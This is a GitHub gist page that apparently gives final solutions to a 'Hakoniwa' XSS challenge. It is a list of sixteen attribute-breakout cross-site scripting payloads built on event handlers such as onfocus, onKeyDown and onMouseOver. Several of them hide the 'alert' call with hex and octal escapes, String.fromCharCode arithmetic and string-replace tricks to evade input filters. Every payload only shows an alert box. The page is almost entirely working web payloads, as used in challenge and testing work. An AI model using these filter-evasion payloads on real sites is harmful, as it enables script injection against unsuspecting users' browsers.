Skip to content

Instantly share code, notes, and snippets.

@lmt-swallow lmt-swallow/Hakoniwa Secret
Created Jan 26, 2014

Embed
What would you like to do?
HakoniwaXSS Final
"onfocusin="top['\x61\x6C\x65\x72\x74']('\x58\x53\x53')"
"onfocusout="parent[String.fromCharCode(500-403,500-392,500-399,500-386,500-384)](String.fromCharCode(300-212,300-217,300-217))"
"onfocus="window['\141\154\145\162\164']('\130\123\123')"
"onKeyDown="parent['aleraaaaat'.replace('aaaaa','')]('XaaaaaSaaaaaS'.replace('aaaaa','').replace('aaaaa',''))"
"onDblClick="window['aleraaaat'.replace('aaaa','')]('XaaaaSaaaaS'.replace('aaaa','').replace('aaaa',''))"
"onMouseUp="window[String.fromCharCode(501-404,501-393,501-400,501-387,501-385)]('XSS')"
"onMouseEnter="alert('XSS')"
"onMouseDown="alert('XSS')"
"onDragStart="alert('XSS')"
"onCut="alert('XSS')"
"onKeyUp="alert('XSS')"
"onCopy="alert('XSS')"
"onPaste="alert('XSS')"
"onMouseOver="alert('XSS')"
"onDrag="alert('XSS')"
"onclick="alert('XSS')"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.